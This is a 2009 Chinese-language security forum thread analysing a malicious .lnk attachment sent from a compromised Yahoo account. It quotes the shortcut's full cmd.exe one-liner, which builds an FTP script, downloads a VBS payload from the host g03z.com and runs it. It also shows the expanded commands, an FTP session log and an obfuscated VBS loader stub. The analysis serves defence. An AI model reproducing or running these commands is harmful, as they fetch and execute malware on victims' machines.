酷!學園

技術討論區 => 系統安全討論版 => 主題作者是: emillala 於 2009-03-18 10:23

主題: *.lnk偽裝檔
作者: emillala2009-03-18 10:23
前些日子我們董事長在泰國時,他的yahoo  mail寄了封mail給一些幹部和別間公司老闆(應該是直接由通訊錄名單發送)..

以上是前言

這封mail有一附加檔案為"預防帳號盜用.lnk"
(http://www.glog.cc/2_5Pic/5_2B807D3E4AA6A.jpg)

我本來以為這是誘使user執行後連結到某網頁致使其產生不良結果

但按右鍵內容一看發現,本應寫上路徑的目標那欄,寫了下面內容..

%windir%\system32\cmd.exe /c echo o web.g03z.com>l&echo aa33>>l&echo bb33>>l&echo set s=echo ge>s.bat&echo set f=t>>s.bat&echo %s%t pnf pnf.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%f%p -s:l>>s.bat&call s.bat&start pnf.vbs&del l s.bat&

(http://www.glog.cc/2_5Pic/5_2B807D03DDA70.jpg)


哇...這根本不是*.lnk該有的作用,已經像是批次檔了

我是第一次看見把*.lnk當成*.bat或*.cmd的檔案在用

真是無所不用其極呀 = =



剛剛發現,當我把它加入壓縮檔後,會變成cmd.exe.........




http://www.badongo.com/cn/file/13925908 (http://www.badongo.com/cn/file/13925908)--->附件內容供參考
主題: 回覆: *.lnk偽裝檔
作者: eose2009-03-18 10:31
可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧 :)
主題: 回覆: *.lnk偽裝檔
作者: emillala2009-03-18 10:36
可以參考一下比較早以前的文章 http://rogerspeaking.com/2009/02/1893 .
*.lnk通常不會是附件的檔案,建議公司mail要擋這類型的附件.
另外董事長的PC應該有問題摟,主動關心一下吧 :)

我之前google了一下

好像不是user的問題

是直接從yahoo mail發的

因為之前也發生過其他人的yahoo發出偽裝檔給某人
(壓縮檔名稱"這是不是你的檔案",然後壓縮檔內容是收件者硬碟裡的一些檔案,而眾多檔案中藏了一個cmd.exe)

把yahoo mail密碼改掉就沒發生過了
主題: 回覆: *.lnk偽裝檔
作者: eose2009-03-18 11:46
yahoo自己寄信?那個yahoo信箱會自己寄信的?沒user的帳號密碼怎麼寄信?
那user的帳號密碼要怎麼來? user都透過什麼上yahoo看信寄信?

請想一想...想清楚你就不會這樣認為了.
主題: 回覆: *.lnk偽裝檔
作者: threeseconds2009-04-06 15:53
今天我轄區也收到這個案例了,一樣是 .lnk 檔,檔案內部如下
代碼: [選擇]
%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....
主題: 回覆: *.lnk偽裝檔
作者: 爬起來吐血2009-06-09 11:32
小弟有點不明白

那個^符號是什麽意思啊

還有 為什麽echo echo bye 這裏有兩個echo
主題: 回覆: *.lnk偽裝檔
作者: hoyo2009-06-09 11:48
今天我轄區也收到這個案例了,一樣是 .lnk 檔,檔案內部如下
代碼: [選擇]
%ComSpec% /c echo set a=.>s.bat&echo echo o www%a%g03z%a%com^>l>>s.bat&call s.bat&echo aa33>>l&echo bb33>>l&echo set sa=echo g>s.bat&echo set vt=tp ->>s.bat&echo %sa%et q p.vbs^>^>l>>s.bat&echo echo bye^>^>l>>s.bat&echo f%vt%s:l>>s.bat&call s.bat&start p.vbs&想做實驗的人可以自行試試看....

該病毒行為是連上 ftp://www.g03z.com
下載病毒執行檔 p.vbs
set 變數的方式令人匪夷所思到想吐血.....

執行後會自動分解成

代碼: [選擇]
C:\>set a=.

C:\>echo o www.g03z.com 1>l

C:\>set sa=echo g

C:\>set vt=tp -

C:\>echo get q p.vbs 1>>l

C:\>echo bye 1>>l

C:\>ftp -s:l
ftp> o www.g03z.com
Connected to www.g03z.com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www.g03z.com:(none)):
331 User name okay, need password.

230 User logged in, proceed.
ftp> get q p.vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for q (1181 Bytes).
226-Maximum disk quota limited to 102400 kBytes
    Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1181 bytes received in 0.03Seconds 38.10Kbytes/sec.
ftp> bye
221 Goodbye!

C:\>

p.vbs 簡略內容
代碼: [選擇]
sub k
for i=1 to UBound(strs)
        runner=runner&chr(strs(i)-547)
next
Execute runner
end sub
strs=array(560,630,648,663,579,654,654,579......很長以下省略)
k

k 實際程式碼請參照圖片 ..... (懶得重打一次)
主題: 回覆: *.lnk偽裝檔
作者: jlovet2009-06-09 13:53
那個主機代管的admin這麼告訴我

Dear sir,
 
    We had taken appropriate action immediately as to warning user.
 
Sincerely Yours,
 
Chief Telecom Inc.

我看他的意思好像是說,我們馬上給這使用者一支口頭警告。
然後就bye了。

我跟Yahoo說,要他們把lnk擋下來。
他告訴我這有可能是偽造地址的郵件,我就又把mail header寄過去。
然後,那個被盜用帳號的可憐人似乎就被封鎖帳號了。
之後還是不斷收到類似的信,竟然都是去抓g03z.com....
上面有四個檔案吧, p,q,s,d

常用的防毒軟體要不是會抓到前面兩個script
就是會抓到後面兩個exe
Bitdefender除外,寄sample過去之後似乎也沒有甚麼反應,讓我對我家的電腦有點擔心,Bitdefender beta使用中...